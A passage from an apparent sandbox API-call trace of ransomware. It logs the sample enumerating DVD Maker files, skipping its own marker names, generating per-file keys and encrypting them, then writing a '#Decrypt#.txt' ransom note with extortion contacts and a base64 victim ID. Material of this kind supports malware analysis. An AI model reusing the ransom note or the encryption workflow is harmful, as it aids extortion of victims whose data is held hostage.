hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7215ac02, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7215ac02, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea6e945, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3dd2a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Scenes_INTRO_BG.wmv", cAlternateFileName="")) returned 1 [0251.705] lstrcmpiW (lpString1="Scenes_INTRO_BG.wmv", lpString2="Windows") returned -1 [0251.705] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv") returned 72 [0251.705] StrStrIW (lpFirst="Scenes_INTRO_BG.wmv", lpSrch=".horseleader") returned 0x0 [0251.705] lstrcmpW (lpString1="Scenes_INTRO_BG.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.706] lstrcmpW (lpString1="Scenes_INTRO_BG.wmv", lpString2="_uninstalling_.png") returned 1 [0251.706] lstrlenW (lpString=".testttjffg") returned 11 [0251.706] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv", lpSrch=".testttjffg") returned 0x0 [0251.706] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.706] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.706] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_intro_bg.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.706] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72180d5f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72180d5f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ec1184f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3fc64, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Scenes_INTRO_BG_PAL.wmv", cAlternateFileName="")) returned 1 [0251.706] lstrcmpiW (lpString1="Scenes_INTRO_BG_PAL.wmv", lpString2="Windows") returned -1 [0251.706] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv") returned 76 [0251.706] StrStrIW (lpFirst="Scenes_INTRO_BG_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.706] lstrcmpW (lpString1="Scenes_INTRO_BG_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.706] lstrcmpW (lpString1="Scenes_INTRO_BG_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.706] lstrlenW (lpString=".testttjffg") returned 11 [0251.706] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.706] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.706] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.706] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_intro_bg_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.707] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x721cd019, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x721cd019, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ec379ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2a8a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Scenes_LOOP_BG.wmv", cAlternateFileName="")) returned 1 [0251.707] lstrcmpiW (lpString1="Scenes_LOOP_BG.wmv", lpString2="Windows") returned -1 [0251.707] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv") returned 71 [0251.707] StrStrIW (lpFirst="Scenes_LOOP_BG.wmv", lpSrch=".horseleader") returned 0x0 [0251.708] lstrcmpW (lpString1="Scenes_LOOP_BG.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.708] lstrcmpW (lpString1="Scenes_LOOP_BG.wmv", lpString2="_uninstalling_.png") returned 1 [0251.708] lstrlenW (lpString=".testttjffg") returned 11 [0251.708] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv", lpSrch=".testttjffg") returned 0x0 [0251.708] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.708] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.708] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_loop_bg.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.708] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7223f430, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7223f430, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ecf6083, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xd43ca, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Scenes_LOOP_BG_PAL.wmv", cAlternateFileName="")) returned 1 [0251.708] lstrcmpiW (lpString1="Scenes_LOOP_BG_PAL.wmv", lpString2="Windows") returned -1 [0251.708] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv") returned 75 [0251.708] StrStrIW (lpFirst="Scenes_LOOP_BG_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.708] lstrcmpW (lpString1="Scenes_LOOP_BG_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.708] lstrcmpW (lpString1="Scenes_LOOP_BG_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.708] lstrlenW (lpString=".testttjffg") returned 11 [0251.708] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.708] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.708] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.709] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_loop_bg_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.709] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72323c5e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72323c5e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ed4233f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xe3dca, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_Page_Ref.wmv", cAlternateFileName="")) returned 1 [0251.709] lstrcmpiW (lpString1="Title_Page_Ref.wmv", lpString2="Windows") returned -1 [0251.709] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv") returned 71 [0251.709] StrStrIW (lpFirst="Title_Page_Ref.wmv", lpSrch=".horseleader") returned 0x0 [0251.709] lstrcmpW (lpString1="Title_Page_Ref.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.709] lstrcmpW (lpString1="Title_Page_Ref.wmv", lpString2="_uninstalling_.png") returned 1 [0251.709] lstrlenW (lpString=".testttjffg") returned 11 [0251.709] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv", lpSrch=".testttjffg") returned 0x0 [0251.709] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.709] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.709] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\title_page_ref.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.709] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723bc1d2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x723bc1d2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf188a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_Page_Ref_PAL.wmv", cAlternateFileName="")) returned 1 [0251.709] lstrcmpiW (lpString1="Title_Page_Ref_PAL.wmv", lpString2="Windows") returned -1 [0251.709] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv") returned 75 [0251.709] StrStrIW (lpFirst="Title_Page_Ref_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.709] lstrcmpW (lpString1="Title_Page_Ref_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.709] lstrcmpW (lpString1="Title_Page_Ref_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.710] lstrlenW (lpString=".testttjffg") returned 11 [0251.710] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.710] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.710] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.710] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\title_page_ref_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.711] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723bc1d2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x723bc1d2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf188a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_Page_Ref_PAL.wmv", cAlternateFileName="")) returned 0 [0251.711] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.712] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\#Decrypt#.txt") returned 66 [0251.712] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.713] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.713] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.715] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.715] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.715] CloseHandle (hObject=0x158) returned 1 [0251.715] GetProcessHeap () returned 0x780000 [0251.715] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.715] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ee00a15, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x4ee00a15, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x14fc, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="photoedge_buttongraphic.png", cAlternateFileName="")) returned 1 [0251.715] lstrcmpiW (lpString1="photoedge_buttongraphic.png", lpString2="Windows") returned -1 [0251.715] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png") returned 75 [0251.715] StrStrIW (lpFirst="photoedge_buttongraphic.png", lpSrch=".horseleader") returned 0x0 [0251.715] lstrcmpW (lpString1="photoedge_buttongraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.715] lstrcmpW (lpString1="photoedge_buttongraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.715] lstrlenW (lpString=".testttjffg") returned 11 [0251.715] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.715] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.715] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.716] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.716] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e8601df, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e8601df, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1274, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="photoedge_selectionsubpicture.png", cAlternateFileName="")) returned 1 [0251.716] lstrcmpiW (lpString1="photoedge_selectionsubpicture.png", lpString2="Windows") returned -1 [0251.716] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png") returned 81 [0251.716] StrStrIW (lpFirst="photoedge_selectionsubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.716] lstrcmpW (lpString1="photoedge_selectionsubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.716] lstrcmpW (lpString1="photoedge_selectionsubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.716] lstrlenW (lpString=".testttjffg") returned 11 [0251.716] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.716] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.716] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.716] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.716] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e88633c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e88633c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1266, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="photoedge_videoinset.png", cAlternateFileName="")) returned 1 [0251.716] lstrcmpiW (lpString1="photoedge_videoinset.png", lpString2="Windows") returned -1 [0251.717] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png") returned 72 [0251.717] StrStrIW (lpFirst="photoedge_videoinset.png", lpSrch=".horseleader") returned 0x0 [0251.717] lstrcmpW (lpString1="photoedge_videoinset.png", lpString2="#Decrypt#.txt") returned 1 [0251.717] lstrcmpW (lpString1="photoedge_videoinset.png", lpString2="_uninstalling_.png") returned 1 [0251.717] lstrlenW (lpString=".testttjffg") returned 11 [0251.717] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png", lpSrch=".testttjffg") returned 0x0 [0251.717] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.717] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.717] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.717] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6efaa4ac, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6efaa4ac, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x59b9, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Postage_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.717] lstrcmpiW (lpString1="Postage_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.717] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png") returned 73 [0251.717] StrStrIW (lpFirst="Postage_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.717] lstrcmpW (lpString1="Postage_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.717] lstrcmpW (lpString1="Postage_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.717] lstrlenW (lpString=".testttjffg") returned 11 [0251.717] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.717] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | 